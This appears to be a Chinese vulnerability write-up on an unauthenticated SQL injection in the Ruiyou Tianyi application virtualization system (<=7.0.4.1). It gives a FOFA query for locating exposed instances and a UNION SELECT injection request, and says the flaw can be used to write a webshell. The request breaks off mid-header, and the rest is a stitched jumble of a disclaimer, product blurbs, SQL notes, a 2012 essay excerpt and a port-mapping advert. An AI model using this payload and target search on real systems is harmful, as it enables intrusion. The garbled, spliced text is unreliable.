0x01 产品简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上，客户端通过WEB即可快速安全的访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等，从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

0x02 漏洞概述

瑞友天翼应用虚拟化系统存在多处SQL注入漏洞，未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。

0x03 影响范围

瑞友天翼应用虚拟化系统 <= 7.0.4.1

0x04 复现环境

FOFA：title="瑞友天翼－应用虚拟化系统" || title="瑞友应用虚拟化系统"

0x05 漏洞复现

PoC-1

GET /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,user()%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel M

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家 安全 、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机 系统 进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！ 瑞友 天翼 应用 虚拟化 系统 （GWT System）是国内具有自主知识产权的 应用 虚拟化 平台，是基于服务器计算（Server-based Computing）的 应用 虚拟化 平台。 瑞友 天翼 （GWT System） 系统 是基于服务器计算架构（Server-based Computing）的 应用 接入平台。它将用户各种业务软件集中部署在 天翼 服务器（群）上，通过 瑞友 RAP协议（Remote Application Protocol），即可让客户端快速 安全 的执行服务器上的 应用 软件， 瑞友 RAP协议对网络的带宽要求非常低，而且优化的屏幕传输技术，让一个客户端连接仅占用3KBps的带宽，从而无需在客户端上安装业务软件，用户也不再受客户端和网络低带宽的限制，可以在任何时间、任何地点、使用任何设备、采用任何网络连接方式，高效、 安全 的访问服务器（群）上的 应用 程序和关键资源。 瑞友 天翼 应用 虚拟化 系统 存在远程代码执行 漏洞 ，未经身份认证的远程攻击者可以利用该 漏洞 在目标 系统 上执行任意代码，（该 漏洞 是通过 SQL注入 写入后门文件进行代码执行）。 表：这些库都是再information_schema库中，information_shcema.tables的意思就是information_schema库下的tables表tables：存放数据库中的表信息columns：存放各表中的列名信息table_name：tables表中存放表名的列名column_name：columns表中存放各个表中列名的列名。 虚拟化 与 瑞友 天翼 应用 ——“ 瑞友 杯” 虚拟化 征文 一、 虚拟化 2012年又是一个 虚拟化 再起热潮的年份，Windows Server 2012的震撼发布，VMware Vsphere 5.1的出炉。无疑都在向世人和企业宣告 虚拟化 的更成熟产品的到来。且不谈论哪个产品更优哪个产品更适合企业，但从各大厂商对 虚拟化 这块大蛋糕进行争夺如此激烈的场面来分析， 虚拟化 是的确要给企业带来更大的... 个人和企业在内网部署的ERP、远程桌面、SSH远程、SVN、个人网盘、OA、ERP、NAS、https或http网站、FTP文件共享服务、管家婆、打印机、视频监控、数据库、服务器等重要办公 系统 和设备 应用 ，在没有拉专线或公网IP的情况下，无法实现异地跨网访问，面对这一难题，只需在内部简单安装快解析软件就能解决，轻松实现内网地址让外网访问。内网映射生效后，在外网电脑或任意上网电脑，浏览器地址栏输入域名+端口即可访问到 瑞友 天翼 的界面。通过这一步映射设置，将 瑞友 访问的内网地址变成外网地址，实现外网的登录访问。